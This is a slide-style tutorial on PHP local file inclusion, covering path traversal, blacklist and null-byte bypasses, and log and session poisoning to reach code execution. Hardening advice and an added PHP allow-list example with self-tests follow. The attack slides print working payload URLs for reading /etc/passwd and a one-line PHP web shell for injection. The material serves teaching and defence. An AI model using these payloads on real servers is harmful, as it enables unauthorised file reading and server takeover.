File inclusion
$ 7absec -- Aaftab Harun (7absec)
File Inclusion is a common web application vulnerability, which can be easily
overlooked as part of the application functionality. Server-side languages such as
PHP or JSP can dynamically include external scripts, reducing the script's overall size
and simplifying the code.
If the inclusion logic isn't implemented properly, attackers can include both local
and remote files, potentially leading to source code disclosure, sensitive data
exposure, and code execution under certain conditions.
https://www.ptsecurity.com/ww-en/analytics/web-application-attacks-2019/
Local File Inclusion | Remote File Inclusion
Local File Inclusion is an attack on a web application in which the attacker makes it
include local files that are already present on the server.
Agenda
1: Basic LFI
2: LFI with Path Traversal
3: LFI with Blacklisting
4: LFI with Appended Extension
5: LFI to Remote Code Execution
   A: RCE through Apache / Nginx Log files
   B: RCE through PHP Session Files
6: Hardening Techniques

1: Basic LFI -- Explanation
• The simplest form of local file inclusion.
• No restrictions && no parameters.
• include($_GET['FileName']);
1: Basic LFI -- Use Case
The World-File inclusion
• Linux
/etc/passwd
http://example.com/?file=/etc/passwd
• Windows
C:\Windows\boot.ini
http://example.com/?file=C:\Windows\boot.ini
2: LFI with Path Traversal -- Explanation
• Sometimes, developers specify absolute paths when including files.
• include("./file/" . $_GET['FileName']);
• Input from parameters can even be used as part of filenames.
• include("file_" . $_GET['FileName']);
2: LFI with Path Traversal -- Use Case
• This restriction can be bypassed by traversing directories using a few ../ before the desired file name.
• http://example.com/?file=../../../../../etc/passwd
• http://example.com/?file=/../../../../../etc/passwd
3: LFI with Blacklisting -- Explanation
• Scripts can employ search-and-replace techniques to strip path traversal sequences.
• $File = str_replace('../', '', $_GET['FileName']);
3: LFI with Blacklisting -- Use Case
• This restriction can be bypassed with ....//....//....// (removing each ../ once leaves another ../ behind, because the replacement is not repeated).
• http://example.com/?file=....//....//....//etc/passwd
• Bypass via URL encoding: ../ == %2e%2e%2f
• http://example.com/?file=%2e%2e%2fetc/passwd
4: LFI with Appended Extension -- Explanation
• Scripts can manually append .php or any other required extension before including the file.
• include($_GET['language'] . ".php");
4: LFI with Appended Extension -- Use Case
• PHP versions before 5.5 are vulnerable to null byte injection.
• Adding a null byte (\x00) at the end of the filename should bypass the extension check.
• This can also be bypassed with PHP wrappers.
• http://example.com/?file=/etc/passwd\x00
5: LFI to Remote Code Execution
• LFI can lead to Remote Code Execution (RCE) under some conditions, resulting in a complete server compromise.
• One common way is to poison log files, which are modified based on requests to the web server.
5A: RCE through Apache / Nginx Log files -- Explanation
• Apache and Nginx maintain various log files such as access.log and error.log.
• The access.log file contains information about all requests made to the server and their User-Agent strings.
• http://example.com/?file=/var/log/apache2/access.log
5A: RCE through Apache / Nginx Log files -- Use Case
• The log contains the remote IP address, requested page, response code, and the User-Agent string.
• <?php system($_GET['cmd']); ?>
5B: RCE through PHP Session Files -- Explanation
• Similar to server log files, PHP saves user sessions on disk.
• This path is dictated by the session.save_path configuration variable, which is empty by default.
• http://example.com/?file=/var/lib/php/sessions/sess_$id
5B: RCE through PHP Session Files -- Use Case
• Injecting a PHP web shell into the session file
• http://example.com/?file=<?php system($_GET['cmd']); ?>
6: Hardening Techniques
1: Use built-in tools
   basename()
   open_basedir
   display_errors
   disable_functions (system, shell_exec, curl_exec, etc.)
2: Do the correct checks
   use an allow-list instead of a deny-list
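As an added example, not part of the deck: a PHP replacement for the slides' include($_GET['FileName']) that applies the hardening list in order (allow-list, basename(), realpath() containment) and audits the php.ini directives the slide names. The page names, the throwaway page directory and the probe strings are assumptions chosen for the demo; run it with php on the command line.

```php
<?php
// Added example (not from the deck): hardened replacement for the slides'
// include($_GET['FileName']). Order matters: allow-list first, basename()
// second, realpath() containment third. Directory name, page names and the
// probe list are assumptions for this demo.
declare(strict_types=1);

/** Pages the application is willing to include: an allow-list, never a deny-list. */
const ALLOWED_PAGES = ['home', 'about', 'contact'];

/**
 * Resolve a user-supplied page name to a file inside $pageDir, or return null
 * if the request must be refused. The raw input never reaches include().
 */
function resolve_page(string $pageDir, string $userInput): ?string
{
    // 1. A null byte is never legitimate here; on pre-5.5 PHP it would
    //    truncate the ".php" appended below (slide 4).
    if (strpos($userInput, "\0") !== false) {
        return null;
    }
    // 2. Compare the decoded value against the allow-list. "../", "....//",
    //    "%2e%2e%2f", log paths, session paths and php:// wrappers all fail
    //    here, and there is no blacklist pattern to work around (slide 3).
    $name = rawurldecode($userInput);
    if (!in_array($name, ALLOWED_PAGES, true)) {
        return null;
    }
    // 3. Defence in depth: basename() drops any directory part that somehow
    //    survived, and the extension is appended by us, not by the user.
    $candidate = $pageDir . DIRECTORY_SEPARATOR . basename($name) . '.php';
    // 4. realpath() canonicalises "../" and symlinks; the result must still
    //    sit under $pageDir or the include is refused (slide 2).
    $real = realpath($candidate);
    $root = realpath($pageDir);
    if ($real === false || $root === false) {
        return null;
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

/** Report which php.ini hardening items from slide 6 are missing at runtime. */
function audit_ini_hardening(): array
{
    $findings = [];
    if ((string) ini_get('open_basedir') === '') {
        $findings[] = 'open_basedir unset: include() can read any file the web user can';
    }
    if (filter_var(ini_get('display_errors'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'display_errors on: include() warnings leak absolute paths';
    }
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    foreach (['system', 'shell_exec', 'exec', 'passthru'] as $fn) {
        if (!in_array($fn, $disabled, true)) {
            $findings[] = "$fn() enabled: a poisoned log or session file can call it";
        }
    }
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'allow_url_include on: include() accepts remote URLs (RFI)';
    }
    return $findings;
}

// --- Self-test with a throwaway page directory so the script runs anywhere ---
$pageDir = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir($pageDir, 0700, true);
file_put_contents($pageDir . '/home.php', "<?php echo \"home page rendered\\n\";\n");

// Probe strings taken from the slides; true means the request should be served.
$probes = [
    'home'                                             => true,
    '../../../../../etc/passwd'                        => false, // slide 2
    '....//....//....//etc/passwd'                     => false, // slide 3
    '%2e%2e%2fetc/passwd'                              => false, // slide 3, URL-encoded
    "/etc/passwd\0"                                    => false, // slide 4, null byte
    '/var/log/apache2/access.log'                      => false, // slide 5A
    '/var/lib/php/sessions/sess_abc123'                => false, // slide 5B, constructed id
    'php://filter/convert.base64-encode/resource=home' => false, // slide 4, wrapper
];
foreach ($probes as $input => $expectServed) {
    $served = resolve_page($pageDir, (string) $input) !== null;
    printf("%-52s %s\n", json_encode($input), $served === $expectServed ? 'ok' : 'FAIL');
}
$page = resolve_page($pageDir, 'home');
if ($page !== null) {
    include $page;   // the only value that ever reaches include()
}
foreach (audit_ini_hardening() as $finding) {
    echo "ini: $finding\n";   // on the CLI expect display_errors and enabled functions
}
unlink($pageDir . '/home.php');
rmdir($pageDir);
```

Every probe except home is rejected at the allow-list step, so steps 3 and 4 only matter if the allow-list is later loosened; the ini audit is a runtime check, since disable_functions and open_basedir cannot be set from script code.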
Questions/Suggestions…
